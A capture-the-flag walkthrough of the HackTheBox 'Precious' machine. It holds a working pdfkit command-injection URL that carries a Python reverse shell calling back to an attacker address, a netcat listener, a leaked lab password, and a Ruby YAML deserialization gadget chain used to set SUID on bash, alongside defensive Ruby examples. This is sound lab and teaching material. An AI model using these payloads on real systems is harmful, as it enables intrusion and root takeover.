HackTheBox / Precious - machine!
Enumeration {nmap}
sudo nmap -sV -sC <target-ip>
Result:
┌──(root㉿kali)-[/home/local_host/Desktop/machines/precious-HTB]
└─# nmap -sV -sC 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 08:28 EST
Nmap scan report for 10.10.11.189
Host is up (0.51s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.86 seconds
Web Reconnaissance
Only SSH and HTTP are exposed, so let's enumerate port 80 first. nginx redirects to http://precious.htb/, so add an entry for 10.10.11.189 precious.htb to /etc/hosts before browsing. The index page is a single form; its page source contains nothing useful.
The web application offers to convert a web page into a PDF file: you give it a URL and it fetches and renders it server-side. Let's test this functionality by pointing it at a server we control.
Start a web server on the attacking machine, bound to the VPN address the target can reach (10.10.14.21 in this writeup; binding to 127.0.0.1 would leave it unreachable from precious.htb):
python3 -m http.server 80 --bind 10.10.14.21
Once the server is running, go back to precious.htb, enter the IP address and port the server is listening on, and click submit. The target fetches the page (the request shows up in the http.server log) and, as expected, a PDF file is downloaded to your machine.
Let's check the metadata of the downloaded PDF:
┌──(root㉿kali)
└─# exiftool 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
ExifTool Version Number : 12.51
File Name : 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
Directory : .
File Size : 18 kB
File Modification Date/Time : 2022:12:10 08:35:39-05:00
File Access Date/Time : 2022:12:10 08:35:52-05:00
File Inode Change Date/Time : 2022:12:10 08:35:39-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Creator : Generated by pdfkit v0.8.6
What's interesting here is the Creator field: the file was generated by pdfkit v0.8.6, a Ruby PDF generation library that wraps the wkhtmltopdf command-line tool. A quick search for known vulnerabilities in that version turns up CVE-2022-25765, a command injection fixed in pdfkit 0.8.7.2: a user-supplied URL containing a URL-encoded space (%20) followed by shell metacharacters is passed to the shell that launches wkhtmltopdf, so backtick command substitution inside the URL executes on the server.
Exploit
Payload
Submit the following URL in the conversion form. The host part (xx.xx.xx.xx) is irrelevant, because the shell evaluates the backticks while building the command line, before wkhtmltopdf ever tries to fetch the page. The Python reverse shell connects back to the attacker at 10.10.14.21:9001:
http://xx.xx.xx.xx/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`
Listener
nc -lnvp 9001
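To make the pdfkit bug class concrete, here is an added example (not pdfkit's own source and not part of the original writeup) that models the vulnerable pattern next to the hardened one. The converter is the stand-in echo so it runs offline; the URL, the SAFE_URL_CHARS allowlist and the helper names are assumptions made for the demonstration. It shows why the %20`...` payload works when a URL is interpolated into a shell string, and that passing argv as an array (no shell) neutralises it even before any input validation.

```ruby
require "uri"

# Added example, not pdfkit's source: a simplified model of the CVE-2022-25765
# bug class. The converter is the stand-in `echo` so this runs offline; in
# pdfkit the real command is wkhtmltopdf.
CONVERTER = "echo".freeze

# Vulnerable pattern: the caller's URL is interpolated into one command string.
# IO.popen hands a string containing shell metacharacters to /bin/sh -c, so
# backticks inside the URL are command-substituted before the converter runs.
# %20 keeps the value free of literal whitespace (so it still "looks like" a
# URL to naive checks) while the shell sees the backticks untouched.
def convert_vulnerable(url)
  IO.popen("#{CONVERTER} #{url}", &:read)
end

# Hardened step 1: never build a shell string. IO.popen with an array execs
# the program directly with no shell, so the URL reaches it byte for byte.
def convert_argv(url)
  IO.popen([CONVERTER, url], &:read)
end

# Hardened step 2 (defence in depth): accept only absolute http(s) URLs built
# from characters that cannot be shell metacharacters. This allowlist is
# deliberately stricter than RFC 3986, which permits ` $ ; & ( ) ' " and
# whitespace via percent-encoding.
SAFE_URL_CHARS = %r{\A[A-Za-z0-9._~:/?#@!*+,=%-]+\z}

def safe_url?(url)
  return false unless url.match?(SAFE_URL_CHARS)
  uri = URI.parse(url)
  uri.is_a?(URI::HTTP) && !uri.host.nil?
rescue URI::InvalidURIError
  false
end

def convert_hardened(url)
  raise ArgumentError, "rejected URL: #{url.inspect}" unless safe_url?(url)
  convert_argv(url)
end

# Constructed sample in the shape of the Precious payload: a URL whose query
# string carries a command in backticks (here a harmless echo).
PAYLOAD = "http://example.test/?name=%20`echo pwned`".freeze

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{convert_vulnerable(PAYLOAD)}"   # backticks were executed
  puts "argv form:  #{convert_argv(PAYLOAD)}"         # backticks passed literally
  puts "hardened:   #{safe_url?(PAYLOAD) ? 'accepted' : 'rejected'}"
end
```

The order of the two fixes matters: the argv form removes the shell from the picture entirely, which is what actually closes the injection; the allowlist only stops the converter itself from being handed odd input such as file:// or javascript: URLs.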
Foothold
The reverse shell lands as the user ruby, the account the web application runs under. Navigating to /home, we find two directories: one for our ruby user and one for a user called henry. Inside henry's directory is user.txt, which has to be the first flag, but ruby cannot read it.
Looking around a bit more, we find a file called config in /home/ruby/.bundle. Bundler stores credentials for private gem sources there, and its contents reveal the password for henry's account: Q3c1AqGHtoI0aXAYFH
With that password we can log in as henry over SSH:
ssh henry@<ip-addr>
Privilege Escalation:
Running sudo -l as henry shows that he can run /usr/bin/ruby /opt/update_dependencies.rb as root without a password. Use cat to take a look at the script: it reads a dependencies.yml file from the current directory and parses it with YAML.load, which resolves arbitrary !ruby/object tags into live objects.
Create a file called dependencies.yml in the current directory with the following contents. It is the well-known Ruby YAML deserialization gadget chain: during deserialization the !ruby/object tags are revived into Gem and Net objects whose initialisation hooks chain into one another until Kernel#system is called on the git_set string.
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod u+s /bin/bash
         method_id: :resolve
Note: the public version of this gadget runs id in git_set. Here it has been replaced with chmod u+s /bin/bash, which sets the SUID bit on bash so that any user can afterwards start a shell running as root.
Run the script from the directory that contains dependencies.yml:
sudo /usr/bin/ruby /opt/update_dependencies.rb
Whatever the script prints afterwards, the gadget has already fired: ls -l /bin/bash now shows the s bit (-rwsr-xr-x). Start bash with -p so it keeps the effective UID of root instead of dropping back to henry:
bash -p
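The root cause of the privilege escalation is the permissive YAML loader, not the sudo rule itself. The following is an added example, not the box's /opt/update_dependencies.rb (whose source is not reproduced in this writeup); it assumes that script does the equivalent of YAML.load(File.read("dependencies.yml")) on a file the caller controls, which is the precondition the gadget above relies on. The Dependency class and the sample document are constructed for the demonstration. It shows that a permissive load turns a tag into a live object of any loaded class, while YAML.safe_load refuses the tag unless the class is explicitly allowlisted.

```ruby
require "yaml"

# Added example, not the box's /opt/update_dependencies.rb. Assumes the real
# script parses a caller-controlled dependencies.yml with a permissive loader.

# Stand-in class for the demonstration. The real gadget chain needs nothing
# the script defines: it revives rubygems and net/http classes that are
# already loaded in any Ruby process that has required rubygems.
class Dependency
  attr_accessor :name, :version
end

# Constructed sample dependencies.yml with an object tag smuggled in.
UNTRUSTED_YAML = <<~DOC
  ---
  - !ruby/object:Dependency
    name: rails
    version: "7.0"
DOC

# The permissive loader. Psych 4 (Ruby 3.1+) made YAML.load call safe_load
# and moved the old behaviour to YAML.unsafe_load; older Psych only has load,
# and there load already resolves !ruby/object tags into objects.
def load_permissive(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# The safe loader: scalars, arrays and hashes only, plus an explicit allowlist.
# Any other !ruby/object tag raises Psych::DisallowedClass instead of
# allocating the object. (permitted_classes: needs Psych >= 3.1, Ruby 2.6+.)
def load_safe(doc, permitted: [])
  YAML.safe_load(doc, permitted_classes: permitted)
end

# True when the loader turned a tag into a live object of the named class,
# i.e. when the document was able to pick the class that gets instantiated.
def instantiates?(doc, klass)
  load_permissive(doc).any? { |item| item.is_a?(klass) }
end

if __FILE__ == $PROGRAM_NAME
  puts "permissive load built a #{load_permissive(UNTRUSTED_YAML).first.class}"
  begin
    load_safe(UNTRUSTED_YAML)
  rescue Psych::DisallowedClass => e
    puts "safe_load refused the document: #{e.message}"
  end
end
```

On the box, replacing the load with YAML.safe_load (no permitted classes, since a dependency list is plain hashes and strings) would have left the sudo rule in place but made the gadget chain unreachable: Gem::Installer, Gem::Requirement and friends would all be rejected at parse time.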
Congratulations, you have root access!
USER FLAG 75fb440c0ef7fd22c28f************
ROOT FLAG 6e8dfa9c1c1968383f0c************